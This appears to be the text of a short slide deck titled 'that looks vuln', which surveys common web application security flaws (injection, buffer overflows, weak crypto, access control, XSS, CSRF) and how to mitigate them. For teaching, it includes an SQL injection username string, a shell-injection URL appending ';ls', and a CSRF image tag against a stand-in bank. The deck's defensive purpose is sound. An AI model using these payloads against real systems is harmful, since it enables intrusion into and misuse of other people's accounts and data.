that looks vuln
common (web) application security issues,
and how to mitigate them
injection attacks
Allowing user input to leak to somewhere where it will be interpreted as code.
mandatory XKCD 327 link:
http://xkcd.com/327/
SQL
Username: "drevil' OR '1' = '1"
SELECT * FROM users WHERE is_admin = '1' and name ="drevil OR '1'='1';
Shell
www.mysite.com/viewcontent.php?filename=my_great_content.txt;ls
injection attacks: mitigation
Validate all external input.
Only allow exactly the kind of values you expect.
Disallowing common "dangerous" characters,
have maximum length
Always use context-aware escaping on output
SQL-safe escapes for sql,
HTML-safe escape for html etc.
There is no one-size-fits all here
Buffer overflow/invalid pointers
http://0pointer.de/
Use a safe language
(although it is not a guarantee, you might still use libraries/third-party tools that are vulnerable)
Impose explicit size limits in APIs
(there are most likely implicit ones anyway)
no crypto
Sensitive data should be encrypted.
If it is stored encrypted, it should be transmitted encrypted.
There is no good performance reason to not use SSL everywhere.
not the other way around
incorrectly used crypto
Worse than no crypto, now the attacker knows where the sensitive data is.
Examples
unsalted passwords
broken random numbers in initialization
TOR with exit relay instead of end-end encryption
Mitigation
Don't roll your own.
Use NaCL or similar
WRONG crypto: mitigation
Don't roll your own!
Use high-level well known and trusted packages like
error handling
information leakage
Sending too much data in errors back to clients can reveal important informaiton to an attacker.
(But don't overdo it, if done right, it can be perfectly fine to say why an error happened)
no/Broken access control
Lock down sensitive endpoints
Don't put session keys in urls so they might get logged
Negotiate per-session secrets
Implement timeouts for sessions
cross site scripting
(XSS)
Injected Javascript can take control over users action on a vulnerable website
Mitigation
Prevent injection at both input and output
Use CSP headers
csrf
Cross Site Request Forgery
Assuming that a logged-in browser can be trusted
Example:
<img src="http://bank.example.com/withdraw?account=Alice&amount=1000000&for=Mallory">
CSRF mitigation
Secret tokens in all requests (hidden form value)
MAC/HMAC
Automatic logout
keep up to date
OWASP top 10 list
https://www.owasp.org/index.php/Top_10_2013-Top_10
Watch CCC security nightmares,
don't repeat the mistakes of others
that looks vuln
By cortex
that looks vuln
- 1,498